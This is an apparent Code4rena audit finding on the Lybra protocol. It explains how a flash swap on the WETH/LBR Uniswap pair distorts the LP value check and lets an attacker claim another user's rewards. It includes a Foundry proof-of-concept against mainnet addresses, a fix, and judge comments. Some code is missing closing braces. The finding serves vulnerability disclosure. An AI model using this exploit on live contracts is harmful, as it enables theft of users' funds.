code-423n4 / 2023-06-lybra-findings

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It is possible to manipulate WETH/LBR pair to claim reward of the users which shouldn't be claimed #442

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


Malicious user can manipulate balances of the WETH/LBR pair and bypass this check

which allows him to steal rewards from a user who has staked enough LP and whose rewards shouldn't be claimable under normal circumstances.

EUSDMiningIncentives.sol is a staking contract which distributes rewards to users based on how much EUSD they have minted/borrowed. Rewards are accumulated over time and can be claimed only if a user has staked enough WETH/LBR uniswap pair LP tokens into another staking

This condition is checked here

As we can see stakedLBRLpValue of a user is calculated based on how much LP he has staked and the total cost of the tokens that are stored inside the WETH/LBR pair

total cost however is simply derived from the sum of the tokens balances, which we get with balanceOf(pair), this can be exploited.

  1. Alice minted some EUSD tokens
  2. She also has staked LP tokens in the staking rewards contract
  3. Currently isOtherEarningsClaimable(alice) returns false, that means she is safe
  4. Bob wants to take rewards of the Alice for himself
  5. He calls a direct swap with WETH/LBR pair and chooses amounts that will lower the total cost of the LP
lbrInLp + etherInLp
  1. Then inside the callback he calls purchaseOtherEarnings and takes reward of the Alice
  2. After that he repays the loan

Proof of Concept

Custom test

// SPDX-License-Identifier: AGPL-3.0-only
pragma solidity ^0.8.17;

import {DSTestPlus} from "solmate/test/utils/DSTestPlus.sol";
import {LybraStETHDepositVault as Vault} from "../contracts/lybra/pools/LybraStETHVault.sol";
import {PeUSDMainnet as PeUSD} from "../contracts/lybra/token/PeUSDMainnetStableVision.sol";
import {EUSD, IERC20} from "../contracts/lybra/token/EUSD.sol";
import {Configurator} from "../contracts/lybra/configuration/LybraConfigurator.sol";
import {EUSDMiningIncentives as Miner} from "../contracts/lybra/miner/EUSDMiningIncentives.sol";
import {StakingRewardsV2} from "../contracts/lybra/miner/stakerewardV2pool.sol";
import {esLBRBoost as Boost} from "../contracts/lybra/miner/esLBRBoost.sol";
import {stETHMock} from "../contracts/mocks/stETHMock.sol";
import {WstETH, IStETH} from "../contracts/mocks/mockWstETH.sol";
import {mockCurve} from "../contracts/mocks/mockCurve.sol";
import {mockEtherPriceOracle} from "../contracts/mocks/mockEtherPriceOracle.sol";
import {mockLBRPriceOracle} from "../contracts/mocks/mockLBRPriceOracle.sol";

import "forge-std/console.sol";
import "forge-std/Test.sol";
import "./FlashBorrower.sol";

contract DAO {
    function checkRole(bytes32, address) external pure returns(bool) {
        return true;
    function checkOnlyRole(bytes32, address) external pure returns(bool) {
        return true;

contract Oracle {
    uint256 price;

    function setPrice(uint256 _price) external {
        price = _price;

    function fetchPrice() external view returns(uint256) {
        return price;

contract ESLBRMock {
    function mint(address, uint256) external returns(bool){
        return true;
    function burn(address, uint256) external returns(bool){
        return true;

contract LybraEUSDPoolTest is Test{
    Vault vault;
    PeUSD peusd;
    EUSD eusd;
    Configurator config;
    Boost boost;
    Miner miner;
    StakingRewardsV2 stakingReward;
    stETHMock stETH;
    WstETH wstETH;
    ESLBRMock eslbr;
    mockCurve curve;
    Oracle oracle;
    DAO dao;
    mockEtherPriceOracle ethOracle;
    mockLBRPriceOracle lbrOracle;
    address[] pools;

    address alice = makeAddr("alice");
    address bob = makeAddr("bob");
    IV2Router router;
    IV2Pair v2Pair; // WETH/LBR
    IERC20 LBR;

    function setUp() public {
        vm.createSelectFork(vm.envString("RPC_MAINNET_URL"), 17592869);
        router = IV2Router(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        v2Pair = IV2Pair(0x061883CD8a060eF5B8d83cDe362C3Fdbd8162EeE);
        WETH = IWETH(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
        LBR = IERC20(0xF1182229B71E79E504b1d2bF076C15a277311e05);

        stETH = new stETHMock();
        wstETH = new WstETH(IStETH(address(stETH)));
        eslbr = new ESLBRMock();
        curve = new mockCurve();
        oracle = new Oracle();
        ethOracle = new mockEtherPriceOracle();
        lbrOracle = new mockLBRPriceOracle();
        dao = new DAO();
        config = new Configurator(address(dao), address(curve));
        eusd = new EUSD(address(config));
        peusd = new PeUSD(address(config), 18, makeAddr("LZ"));
        config.initToken(address(eusd), address(peusd));
        vault = new Vault(address(config), address(stETH), address(oracle));

        config.setMintVault(address(vault), true);
        oracle.setPrice(1800 * 1e18);

        boost = new Boost();
        miner = new Miner(address(config), address(boost), address(ethOracle), address(lbrOracle)); 
        stakingReward = new StakingRewardsV2(address(v2Pair), address(eslbr), address(boost));
        miner.setEthlbrStakeInfo(address(stakingReward), address(v2Pair));
        miner.setToken(address(LBR), address(eslbr));

        config.setMintVaultMaxSupply(address(vault), 10_000_000 * 1e18);
        config.setSafeCollateralRatio(address(vault), 160 * 1e18);
        config.setBadCollateralRatio(address(vault), 150 * 1e18);
        stETH.approve(address(vault), ~uint256(0));, 10 ether);
        stETH.transfer(alice, 500 ether);

    function swapAndLiquify(address who, uint256 amount, address[] memory path) internal {
        // get WETH and LBR, purchase and stake LP tokens
        WETH.deposit{value: amount}();
        WETH.approve(address(router), ~uint256(0));
        LBR.approve(address(router), ~uint256(0));
        v2Pair.approve(address(stakingReward), ~uint256(0));
        router.swapExactTokensForTokens(amount/2, 0, path, who, block.timestamp);
        router.addLiquidity(address(WETH), address(LBR), amount/2, (amount * 1000)/2, 1, 1, who, block.timestamp);

    function testFlashLoanAttack() public {
        uint256 mintAmount = 1800*60*1e18;

        address[] memory path = new address[](2);
        path[0] = address(WETH);
        path[1] = address(LBR);

        // PREP THE ATTACK
        // Alice has borrowed 540_000 EUSD and staked 126 LP tokens 
        vault.depositAssetToMint(100*1e18, mintAmount);
        swapAndLiquify(address(this), 0.8 ether, path);
        stETH.approve(address(vault), ~uint256(0));
        vault.depositAssetToMint(500*1e18, mintAmount * 5);
        swapAndLiquify(alice, 10 ether, path);

        assertEq(miner.isOtherEarningsClaimable(address(this)), true);
        assertEq(miner.isOtherEarningsClaimable(alice), false);

        FlashBorrower flashBorrower = new FlashBorrower(WETH, LBR, miner, stakingReward, v2Pair, router, alice);         
        WETH.approve(address(flashBorrower), ~uint256(0));
        LBR.approve(address(flashBorrower), ~uint256(0));
        // Get some tokens to repay flash swap fees
        WETH.deposit{value: 6 ether}();

        router.swapExactTokensForTokens(3 ether, 0, path, address(this), block.timestamp);
        WETH.transfer(address(flashBorrower), 1000);
        LBR.transfer(address(flashBorrower), 1000);
        // Drain tokens from the pair and manipulate {stakedLBRLpValue} to pass this check and claim rewards from the target
        flashBorrower.flash(800 ether, 800000 ether);

FlashBorrower contract, notice the require check where we check if target user reward is claimable

// SPDX-License-Identifier: AGPL-3.0-only
pragma solidity ^0.8.17;

import {EUSDMiningIncentives as Miner} from "../contracts/lybra/miner/EUSDMiningIncentives.sol";
import {StakingRewardsV2} from "../contracts/lybra/miner/stakerewardV2pool.sol";
import {IERC20} from "../contracts/lybra/token/EUSD.sol";

import "forge-std/console.sol";

interface IV2Pair is IERC20 {
    function factory() external view returns(address);
    function swap(
        uint amount0Out,
        uint amount1Out,
        address to,
        bytes calldata data
    ) external;

interface IV2Router {
    function factory() external view returns(address);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

interface IWETH is IERC20 {
    function deposit() external payable;
    function withdraw(uint amount) external;

contract FlashBorrower {
    IWETH token0;
    IERC20 token1;
    Miner miner;
    StakingRewardsV2 staking;
    IV2Pair v2Pair;
    IV2Router v2Router;
    address target;

        IWETH _token0,
        IERC20 _token1,
        Miner _miner,
        StakingRewardsV2 _staking,
        IV2Pair _v2Pair,
        IV2Router _v2Router,
        address _target
    ) {
        token0 = _token0;
        token1 = _token1;
        miner = _miner;
        staking = _staking;
        v2Pair = _v2Pair;
        v2Router = _v2Router;
        target = _target;
        token0.approve(address(v2Router), ~uint256(0));
        token1.approve(address(v2Router), ~uint256(0));
        v2Pair.approve(address(v2Router), ~uint256(0));

    function uniswapV2Call(
        address sender,
        uint256 amount0,
        uint256 amount1,
        bytes calldata data
    ) external {
        address caller = abi.decode(data, (address));

        require(miner.isOtherEarningsClaimable(target), "CAN'T GRAB TARGET'S REWARD");

        // Repay borrow
        uint256 fee0 = (amount0 * 3) / 997 + 1;
        uint256 fee1 = (amount1 * 3) / 997 + 1;
        uint256 amountToRepay0 = amount0 + fee0;
        uint256 amountToRepay1 = amount1 + fee1;

        // Transfer flash swap fee from caller
        token0.transferFrom(caller, address(this), fee0);
        token1.transferFrom(caller, address(this), fee1);

        // Repay
        token0.transfer(address(v2Pair), amountToRepay0);
        token1.transfer(address(v2Pair), amountToRepay1);

    function flash(uint256 amount0, uint256 amount1) public {
        bytes memory data = abi.encode(msg.sender);
        v2Pair.swap(amount0, amount1, address(this), data);

Tools Used

Forge I forked the ETH mainnet at the block 17592869 also following mainnet contracts were used Uniswap V2 router (0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D), WETH/LBR uniswap pair (0x061883CD8a060eF5B8d83cDe362C3Fdbd8162EeE), WETH token (0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2), LBR token (0xF1182229B71E79E504b1d2bF076C15a277311e05)

Recommended Mitigation Steps

Use ethlbrLpToken.getReserves() instead of quoting balances directly with balanceOf

(uint112 r0, uint112 r1, ) = ethlbrLpToken.getReserves()
uint256 etherInLp = (r0 * uint(etherPrice)) / 1e8;
uint256 lbrInLp = (r1 * uint(lbrPrice)) / 1e8;

Assessed type


c4-pre-sort commented 1 year ago

JeffCX marked the issue as primary issue

LybraFinance commented 1 year ago

The real price will be obtained through Chainlink oracles instead of the exchange rate in the LP, and it will not be manipulated by flash loans.

c4-sponsor commented 1 year ago

LybraFinance marked the issue as sponsor disputed

0xean commented 1 year ago

@LybraFinance - I think this qualifies as M. Are you suggesting that in the future the price will be pull from chainlink? if so the wardens are reviewing the code base as written, not future changes to include a different price discovery mechanism and therefore I think this is valid.

c4-judge commented 1 year ago

0xean changed the severity to 2 (Med Risk)

c4-sponsor commented 1 year ago

LybraFinance marked the issue as sponsor acknowledged

c4-judge commented 1 year ago

0xean marked the issue as satisfactory

c4-judge commented 1 year ago

0xean marked the issue as selected for report